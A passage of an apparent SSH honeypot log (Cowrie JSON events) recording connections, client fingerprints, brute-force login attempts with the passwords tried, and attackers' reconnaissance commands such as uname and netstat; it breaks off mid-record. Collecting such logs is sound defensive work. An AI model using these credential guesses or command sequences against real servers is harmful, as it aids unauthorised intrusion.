{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:36:57.317189Z","src_ip":"212.227.235.229","session":"c675d2e85bba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53582,"dst_ip":"1.2.3.4","dst_port":22,"session":"aab2940b396d","protocol":"ssh","message":"New connection: 212.227.235.229:53582 (1.2.3.4:22) [session: aab2940b396d]","sensor":"my-vps","timestamp":"2025-08-31T03:36:57.684209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:36:57.684871Z","src_ip":"212.227.235.229","session":"aab2940b396d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:36:58.001762Z","src_ip":"212.227.235.229","session":"aab2940b396d"}
{"eventid":"cowrie.login.failed","username":"lenovo","password":"lenovo!@#123","message":"login attempt [lenovo/lenovo!@#123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:36:59.311784Z","src_ip":"212.227.235.229","session":"aab2940b396d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:00.634297Z","src_ip":"212.227.235.229","session":"aab2940b396d"}
{"eventid":"cowrie.login.success","username":"root","password":"Bitencourtcorr","message":"login attempt [root/Bitencourtcorr] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:37:00.709052Z","src_ip":"212.227.125.160","session":"fbf2f30a440b"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":34730,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcff61b46ba6","protocol":"ssh","message":"New connection: 34.14.223.46:34730 (1.2.3.4:22) [session: dcff61b46ba6]","sensor":"my-vps","timestamp":"2025-08-31T03:37:01.274221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:37:01.275020Z","src_ip":"34.14.223.46","session":"dcff61b46ba6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:37:01.767073Z","src_ip":"34.14.223.46","session":"dcff61b46ba6"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-31T03:37:02.783194Z","src_ip":"34.14.223.46","session":"dcff61b46ba6"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"1234567","message":"login attempt [hadoop/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:37:03.213915Z","src_ip":"212.227.235.229","session":"c675d2e85bba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:37:03.290970Z","src_ip":"212.227.125.160","session":"fbf2f30a440b"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T03:37:03.291706Z","src_ip":"212.227.125.160","session":"fbf2f30a440b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"26.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 26.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:03.506538Z","src_ip":"212.227.125.160","session":"aa279bbec812"}
{"eventid":"cowrie.session.closed","duration":"100.2","message":"Connection lost after 100.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:03.508064Z","src_ip":"212.227.125.160","session":"aa279bbec812"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53426,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e85a4f8cd4c","protocol":"ssh","message":"New connection: 212.227.125.160:53426 (1.2.3.4:22) [session: 6e85a4f8cd4c]","sensor":"my-vps","timestamp":"2025-08-31T03:37:04.141376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:37:04.142096Z","src_ip":"212.227.125.160","session":"6e85a4f8cd4c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:04.282506Z","src_ip":"34.14.223.46","session":"dcff61b46ba6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:37:04.399702Z","src_ip":"212.227.125.160","session":"6e85a4f8cd4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:04.431978Z","src_ip":"212.227.125.160","session":"fbf2f30a440b"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:04.433242Z","src_ip":"212.227.125.160","session":"fbf2f30a440b"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:04.946043Z","src_ip":"212.227.235.229","session":"c675d2e85bba"}
{"eventid":"cowrie.login.failed","username":"tempusr","password":"1234512345","message":"login attempt [tempusr/1234512345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:37:05.498919Z","src_ip":"212.227.125.160","session":"6e85a4f8cd4c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:06.765489Z","src_ip":"212.227.125.160","session":"6e85a4f8cd4c"}
{"eventid":"cowrie.session.closed","duration":"22.7","message":"Connection lost after 22.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:11.815032Z","src_ip":"212.227.125.160","session":"773b8aa744c3"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:37:13.860961Z","src_ip":"212.227.235.229","session":"38ddba339f3d"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":34536,"dst_ip":"1.2.3.4","dst_port":22,"session":"fde081ce0f36","protocol":"ssh","message":"New connection: 201.148.180.50:34536 (1.2.3.4:22) [session: fde081ce0f36]","sensor":"my-vps","timestamp":"2025-08-31T03:37:14.070605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:37:14.843031Z","src_ip":"201.148.180.50","session":"fde081ce0f36"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:37:14.843769Z","src_ip":"201.148.180.50","session":"fde081ce0f36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49486,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6141890e1f6","protocol":"ssh","message":"New connection: 212.227.125.160:49486 (1.2.3.4:22) [session: d6141890e1f6]","sensor":"my-vps","timestamp":"2025-08-31T03:37:17.411901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:37:17.860780Z","src_ip":"212.227.125.160","session":"d6141890e1f6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:37:17.861639Z","src_ip":"212.227.125.160","session":"d6141890e1f6"}
{"eventid":"cowrie.login.success","username":"root","password":"Bitencourtcorr","message":"login attempt [root/Bitencourtcorr] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:37:20.134828Z","src_ip":"201.148.180.50","session":"fde081ce0f36"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"1234567","message":"login attempt [hadoop/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:37:21.795008Z","src_ip":"212.227.125.160","session":"d6141890e1f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:37:22.626657Z","src_ip":"201.148.180.50","session":"fde081ce0f36"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T03:37:22.627543Z","src_ip":"201.148.180.50","session":"fde081ce0f36"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:23.351311Z","src_ip":"212.227.125.160","session":"d6141890e1f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"2.9","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:25.557969Z","src_ip":"201.148.180.50","session":"fde081ce0f36"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:25.559317Z","src_ip":"201.148.180.50","session":"fde081ce0f36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46024,"dst_ip":"1.2.3.4","dst_port":22,"session":"1173b0ceeeb9","protocol":"ssh","message":"New connection: 212.227.235.229:46024 (1.2.3.4:22) [session: 1173b0ceeeb9]","sensor":"my-vps","timestamp":"2025-08-31T03:37:28.163120Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:37:30.182760Z","src_ip":"212.227.235.229","session":"38ddba339f3d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:37:30.183461Z","src_ip":"212.227.235.229","session":"38ddba339f3d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:37:35.343467Z","src_ip":"212.227.235.229","session":"1173b0ceeeb9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:37:35.345802Z","src_ip":"212.227.235.229","session":"1173b0ceeeb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"11.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 11.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:41.938948Z","src_ip":"212.227.235.229","session":"38ddba339f3d"}
{"eventid":"cowrie.session.closed","duration":"99.9","message":"Connection lost after 99.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:37:42.232613Z","src_ip":"212.227.235.229","session":"38ddba339f3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39000,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cfbfb63a444","protocol":"ssh","message":"New connection: 212.227.235.229:39000 (1.2.3.4:22) [session: 9cfbfb63a444]","sensor":"my-vps","timestamp":"2025-08-31T03:37:55.590988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:37:56.307586Z","src_ip":"212.227.235.229","session":"9cfbfb63a444"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:37:56.308503Z","src_ip":"212.227.235.229","session":"9cfbfb63a444"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60542,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd2762fc3e88","protocol":"ssh","message":"New connection: 212.227.125.160:60542 (1.2.3.4:22) [session: bd2762fc3e88]","sensor":"my-vps","timestamp":"2025-08-31T03:37:58.151648Z"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"12345678","message":"login attempt [hadoop/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:38:02.440449Z","src_ip":"212.227.235.229","session":"9cfbfb63a444"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:38:04.271051Z","src_ip":"212.227.235.229","session":"9cfbfb63a444"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"86d9fe1bb2da","protocol":"ssh","message":"New connection: 212.227.125.160:6103 (1.2.3.4:22) [session: 86d9fe1bb2da]","sensor":"my-vps","timestamp":"2025-08-31T03:38:11.004595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-31T03:38:11.072456Z","src_ip":"212.227.125.160","session":"86d9fe1bb2da"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","